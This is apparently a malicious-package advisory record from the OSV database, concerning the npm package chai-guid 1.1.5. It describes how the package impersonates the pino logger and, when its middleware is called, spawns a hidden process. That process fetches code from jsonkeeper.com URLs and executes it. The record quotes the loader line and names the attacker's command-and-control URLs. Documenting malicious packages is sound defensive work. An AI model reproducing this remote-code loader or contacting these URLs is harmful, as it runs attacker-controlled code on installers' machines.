{"id":"MAL-2026-5903","summary":"Malicious code in chai-guid (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (69e9bcacf8dca52aafe4d93019b888c6d32e344b500a21368f036bf586eee161)\nchai-guid impersonates the pino logger and the chai-guid chai plugin (README copies pino badges and pinojs CI links; index.js exports middleware as `module.exports.pino`). When a consumer calls the exported middleware, index.js spawns lib/caller.js as a detached Node process with stdio ignored. lib/caller.js performs `axios.get('https://jsonkeeper.com/b/U2BTS')`, reads the `.cookie` field of the response, and executes it via `new Function.constructor('require', s)(require)` — running attacker-controlled JavaScript with full Node privileges and `require` injected. A second base64-encoded URL (`https://jsonkeeper.com/b/XRGF3`) is hidden in a fake `process.env.DEV_API_KEY` shim in lib/caller.js and lib/const.js as a secondary C2 endpoint. jsonkeeper.com is an anonymous, mutable JSON-paste host; whatever bytes the attacker pastes there will be executed on the installer's machine the moment any consumer invokes the package's middleware.\n","aliases":["GHSA-g8gv-g8mr-x8pc"],"modified":"2026-09-01T11:31:28.503298644Z","published":"2026-06-16T16:22:49Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-006791","import_time":"2026-06-16T18:10:20.558097863Z","modified_time":"2026-06-16T16:22:49Z","sha256":"69e9bcacf8dca52aafe4d93019b888c6d32e344b500a21368f036bf586eee161","source":"amazon-inspector","versions":["1.1.5"]},{"import_time":"2026-07-20T13:14:44.481842108Z","modified_time":"2026-07-20T10:36:57Z","sha256":"a26b871b61bc8aa514a61a0842780c115c29e9da47d4291ed9953edf041833e4","source":"reversing-labs","versions":["1.1.5"],"id":"RLMA-2026-05510"},{"id":"RLUA-2026-06141","import_time":"2026-09-01T11:18:00.046813523Z","modified_time":"2026-08-24T16:43:58Z","sha256":"fc76c24dedbe0e1ae3436faa97645b315daa76d0a087f024146c6e5d212cd9e5","source":"reversing-labs"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/chai-guid/v/1.1.5"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-g8gv-g8mr-x8pc"}],"affected":[{"package":{"name":"chai-guid","ecosystem":"npm","purl":"pkg:npm/chai-guid"},"versions":["1.1.5"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"path":"lib/caller.js","sha256":"6e9c6643cf66d24db6350eb1c03d6f0f862243ee18ab557c9be20d847dff9f36","tlsh":"c2017b4a30fa605c015510f64b1fe4317012e4173c49e5c5378c87514fea5ae6963eed"},{"sha256":"eb7b3421ed751a4f2d536fe39b40d10c5839196fc4e2c1c34f0a4431a08fb2b3","tlsh":"88019761ce788e2304ed25928c2e0643ba619c079828fc2d32db512c4f9e9bf01bf25d","path":"package.json"}],"package_integrity":[{"filename":"chai-guid-1.1.5.tgz","hashes":{"sha512_sri":"sha512-gRwBjAJ8G9BHyw8lbqZJxZ9SofBUrsveVDnYW8FTBM9972sa2Jfs7GfK+Mjtk/PjBCylIWyj+E5fSE8pYSO22A==","sha1":"55fcb809a1ed7af8b7fba2f7923688c4a793253f"}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chai-guid/MAL-2026-5903.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"ReversingLabs","contact":["https://www.reversinglabs.com"],"type":"FINDER"}]}